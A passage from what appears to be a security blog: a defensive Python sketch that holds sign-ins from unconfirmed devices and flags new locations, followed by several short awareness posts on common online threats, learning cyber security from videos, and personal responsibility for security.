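    """Per-account state; all field names are hypothetical."""
    trusted_devices: set = field(default_factory=set)
    known_countries: set = field(default_factory=set)
    pending: set = field(default_factory=set)    # devices awaiting owner confirmation
    alerts: list = field(default_factory=list)   # unusual-behaviour findings

def evaluate_login(acct, device_id, country):
    """Return 'allow' or 'hold' for a sign-in that already passed the password check."""
    # "Data Integrity": flag access from a location never seen on this account.
    if acct.known_countries and country not in acct.known_countries:
        acct.alerts.append(f"new location {country} from device {device_id}")
    # "Trusted Devices": an unknown device gets no access until the owner confirms it.
    if device_id not in acct.trusted_devices:
        acct.pending.add(device_id)
        return "hold"
    acct.known_countries.add(country)  # learn locations only from trusted devices
    return "allow"

def confirm_device(acct, device_id, country):
    """Owner explicitly approves a held device (assumed to happen out of band)."""
    if device_id not in acct.pending:
        raise ValueError("no pending request for this device")
    acct.pending.discard(device_id)
    acct.trusted_devices.add(device_id)
    acct.known_countries.add(country)

def replay(events):
    """Run sign-in events through both checks; return the decisions and final state."""
    acct = Account(trusted_devices={"laptop-1"}, known_countries={"DE"})
    decisions = []
    for ev in events:
        if ev["type"] == "login":
            decisions.append(evaluate_login(acct, ev["device"], ev["country"]))
        elif ev["type"] == "confirm":
            confirm_device(acct, ev["device"], ev["country"])
    return decisions, acct

# Constructed sample events, not real TeamViewer logs.
SAMPLE_EVENTS = [
    {"type": "login", "device": "laptop-1", "country": "DE"},    # usual device
    {"type": "login", "device": "phone-7", "country": "DE"},     # new device: held
    {"type": "confirm", "device": "phone-7", "country": "DE"},   # owner approves it
    {"type": "login", "device": "phone-7", "country": "DE"},     # now allowed
    {"type": "login", "device": "box-99", "country": "BR"},      # reused password: held + alert
    {"type": "login", "device": "laptop-1", "country": "FR"},    # trusted device, new place: alert
]

if __name__ == "__main__":
    decisions, acct = replay(SAMPLE_EVENTS)
    print(decisions)
    print(acct.alerts)
```

A correct password on an unconfirmed device ends in "hold", which is the case that matters when credentials reused from another breach are tried against the account.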



~ Tuesday, 7 June 2016 0 comments

The Ultimate Guide to Security Threats

Internet security expert McAfee is helping everyday web users to get up to speed with the threats they face online with a new tool.

The firm has launched The Ultimate Guide To Security Threats in a bid to raise awareness of the common dangers that lurk within the realms of the world wide web.

The guide, embedded below, offers an at-a-glance resource for users to bookmark and understand viruses, spam, spoofing, phishing, Trojan horses, botnets, worms, spyware and DDoS attacks.

It also looks at a timeline of high profile recent hacks, demonstrating the scale and severity of the security risk – as well as the increasing sophistication and ambition displayed by cyber criminals.

Brought to you by McAfee - Intel Security

~ Monday, 16 May 2016 0 comments

Learning Basic Cyber Security from Online Videos



If you’re interested in learning basic cyber security, then one of the best ways of doing so is by making full use of the resources that are readily available. With the internet at your fingertips there are a lot of options out there, but one of the fastest ways for anyone to wrap their head around the essentials of cyber security is by delving into the many videos that are online.


Types of Cyber Security Videos


Generally speaking, the types of cyber security videos that you’ll find tend to vary – but most fit into the following sort of varieties:

  • Introduction style videos that give you a rough overview of cyber security and what it is all about.
  • Concept style videos that talk about some of the concepts associated with cyber security and may focus on specific topics such as exploits, viruses, or vulnerabilities.
  • ‘How to’ style videos that show you how to perform some of the activities that are associated with cyber security.

As you can imagine, each of these types of videos is useful in its own way and when you first start there’ll definitely be benefits to watching all three. Later on the ‘how to’ video guides may be a bit more important however, as they’ll teach you how to actually do some of the things that you want to do.

Where to Find the Videos


Nowadays there are tons of different websites and video sharing platforms where you can find the videos that you need – but YouTube is a fairly good place to start. Alternatively you could use Google’s video search or even just look for cyber security websites that have their own videos.

Most of the videos that you find will be streamed, but seeing as that’s the norm it is to be expected.

Saving Cyber Security Videos for Reference


It might be a good idea to save some of the more useful cyber security videos that you find for reference. However, because these videos are being streamed, you’ll need to work around that and use a desktop recorder such as the Movavi Screen Capture Studio to get it done.

With the Movavi Screen Capture Studio you’ll be able to record the video easily, and then you can use its other features to cut the video into segments so that you only keep the parts that are really important. If you like, you can do this to several videos and then merge together the important bits that you’re keeping.

Also you can use the other features to enhance the video quality, insert customizable text, add background music or voiceovers, or even use special effects and filters. It is worth noting that you can even use the Movavi Screen Capture Studio to extract audio from video, just in case you want to save the videos in audio-only format.

By saving the better videos, you can be certain you’ll always have them on hand for reference should the need arise.

~ Monday, 21 December 2015 0 comments

The Theory of Every Hacking Attack

“Nobody can hack you without your permission”

Sometimes it is very hard to put your feelings and thoughts into words, especially if you are trying to say something about someone’s privacy and security. It is not an easy job to handle a situation when your friend, client or loved one has been hacked, but you have to manage it; you have to take some steps to reduce the loss as much as you can. Why do we always think about the techniques to implement after getting hacked? Why not do something that prevents hacking attacks? Why not find the problem that ended in a hacking attack?

Every hacking Attack

The answer to all of these questions lies within yourself: you are, first and foremost, responsible for managing and securing your assets (privacy, passwords, etc.). “Nobody can hack you without your permission” does not mean that a hacker needs your written approval prior to a hacking attack. What it really means is that you, intentionally or unintentionally, give a hacker the opportunity to exploit your security. So you are the one who is responsible and answerable for your own security and privacy. The government, your ISP and even your vendor have limited resources for managing your security, but you have all the resources.

Let's consider an example. I see that many organizations are reluctant to upgrade the systems and processes that prevent hacking attacks; most of the time they care about saving money, or they simply don't care about the security of their data. And the result is a breach and stolen data. Now tell me, who is responsible? Is it the network administrator, who made several proposals to upgrade the system while you did not release the funds? So who is responsible?

The theory of every hacking attack is: “Nobody can hack you without your permission” or “Your security is directly proportional to your willingness to stay secure”

It’s time to take some serious steps to strengthen your security, and you should care about it because it’s all about your data. If you work in the infosec industry, you should also spread information, knowledge and awareness so that ordinary users can take steps to stay secure.

It's our job to spread the theory of every hacking attack.

~ Wednesday, 4 March 2015 0 comments